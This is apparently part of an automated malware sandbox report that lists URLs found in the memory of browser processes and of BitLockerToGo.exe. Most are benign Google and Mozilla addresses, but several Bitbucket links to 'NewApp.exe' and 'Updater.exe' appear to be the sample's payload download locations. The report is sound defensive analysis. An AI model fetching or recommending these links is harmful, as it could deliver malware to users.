                        Source: chrome.exe, 00000005.00000002.2730829997.000007C000088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                        Source: chrome.exe, 00000005.00000002.2730829997.000007C000088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                        Source: chrome.exe, 00000005.00000002.2730829997.000007C000088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                        Source: chrome.exe, 00000005.00000002.2730898591.000007C0000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                        Source: chrome.exe, 00000005.00000003.2686421480.000007C001D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2685697337.000007C001D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                        Source: chrome.exe, 00000005.00000002.2736338864.000007C000984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000319C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000319C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/11775b90-6f69-4884-847d-757e205605be/downloads/08b6d961-2cc7-
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000319C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/11775b90-6f69-4884-847d-757e205605be/downloads/bdcb8c2b-056c-
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E74000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/NewApp.exe
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/NewApp.exe1kkkk1326432https://bitbucket.org/jhg1a/yujth/
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/NewApp.exeata;
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/NewApp.exeil
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/NewApp.exep
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/NewApp.exex
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E74000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/Updater.exe
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/Updater.exe%l
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/Updater.exeKit/605.1.15
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhg1a/yujth/downloads/Updater.exeta;
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                        Source: chrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000319C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                        Source: chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_apia
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733802471.000007C00063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: chrome.exe, 00000005.00000002.2731148106.000007C00012C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.co
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2730625918.000007C00001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2829522376.00007CF00016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                        Source: chrome.exe, 00000005.00000002.2733989529.000007C000698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                        Source: chrome.exe, 00000005.00000002.2741799614.000007C0012B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740718077.000007C00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                        Source: chrome.exe, 00000005.00000002.2740718077.000007C00102C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en3
                        Source: chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=end
                        Source: chrome.exe, 00000005.00000003.2657846639.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658707564.000007C000CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657810354.000007C00033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651375363.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655499998.000007C000CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2653389180.000007C000EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                        Source: chrome.exe, 00000005.00000002.2730625918.000007C00001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2829522376.00007CF00016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                        Source: chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g
                        Source: chrome.exe, 00000005.00000003.2635622037.00000014002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2635638475.00000014002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2730625918.000007C00001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734414204.000007C000718000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2828515754.00007CF000040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                        Source: chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                        Source: chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                        Source: chrome.exe, 00000005.00000002.2737001445.000007C000A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                        Source: chrome.exe, 00000005.00000002.2737208033.000007C000AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.googl0
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
